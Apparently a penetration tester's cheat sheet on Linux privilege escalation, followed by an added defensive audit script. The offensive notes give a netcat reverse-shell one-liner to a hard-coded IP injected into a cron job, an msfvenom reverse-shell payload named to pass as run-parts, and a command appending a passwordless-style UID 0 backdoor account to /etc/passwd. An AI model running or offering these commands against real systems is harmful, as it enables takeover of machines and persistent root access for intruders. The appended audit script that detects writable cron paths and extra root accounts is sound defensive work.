Linux Escalate
Crontab
Check crontab:
crontab -l
cat /etc/crontab
Check cron logs:
cat /var/log/cron.log
Check permissions of file:
ls -al FILE
Example vulnerable crontab with a writable path of /usr/local/bin:
Add injectable into cron job:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.224 8008 >/tmp/f" >> CRON JOB
OR
Create a shell and copy it to a good location:
msfvenom -p linux/x64/shell_reverse_tcp lhost=IP lport=PORT -f elf-so -o run-parts
Writable paths
Check for paths that systemd writes to, any path that crontab uses, any writable services, etc.:
/usr/local/bin
/usr/bin
/etc/passwd
Check whether /etc/passwd is readable and writable using ls -al. If it is, create a password hash:
openssl passwd P@ssw0rd
Add to /etc/passwd:
echo "rooted:O2dKjKQQCeuQE:0:0:root:/root:/bin/bash" >> /etc/passwd
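An added audit example (not part of the original notes) covering both the Crontab and /etc/passwd sections above from the defender's side: it flags group- or world-writable directories and scripts that a crontab depends on, a loosely permissioned passwd file, extra UID 0 accounts and hashes stored inline in field 2. The function names are hypothetical, and it assumes a system-style crontab such as /etc/crontab.

```shell
#!/bin/sh
# Added audit example, not from the original notes. Function names are hypothetical.

# True when the path is group- or world-writable (ls mode string, symlinks followed).
is_loose() {
    case $(ls -ldL -- "$1" 2>/dev/null) in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# Report PATH= directories and absolute paths used by jobs that non-owners can modify.
audit_cron_paths() {
    {
        # Directories listed in the crontab's PATH= line
        grep -E '^[[:space:]]*PATH=' "$1" | cut -d= -f2- | tr ':' '\n'
        # Absolute paths in job lines (comments, blanks and VAR= lines skipped)
        grep -vE '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" | grep -oE '/[^[:space:];|&"]+'
    } | sort -u | while read -r p; do
        # Only regular files and directories; this skips /dev/null and "*/5" fragments
        [ -f "$p" ] || [ -d "$p" ] || continue
        if is_loose "$p"; then echo "WRITABLE $p"; fi
    done
}

# Report a loosely permissioned passwd file, extra UID 0 accounts and inline hashes.
audit_passwd() {
    if is_loose "$1"; then echo "WRITABLE $1"; fi
    awk -F: '
        /^#/ || NF < 7 { next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        # Field 2 is normally "x" (hash lives in /etc/shadow), "*" or "!..."
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "INLINE_HASH " $1 }
    ' "$1"
}

# Run against the live files when they exist.
if [ -r /etc/crontab ]; then audit_cron_paths /etc/crontab; fi
if [ -r /etc/passwd ]; then audit_passwd /etc/passwd; fi
```

Any WRITABLE line for a PATH directory means a job that calls a command by bare name (such as run-parts) can be shadowed by a file planted there; fix with chown root:root and chmod go-w.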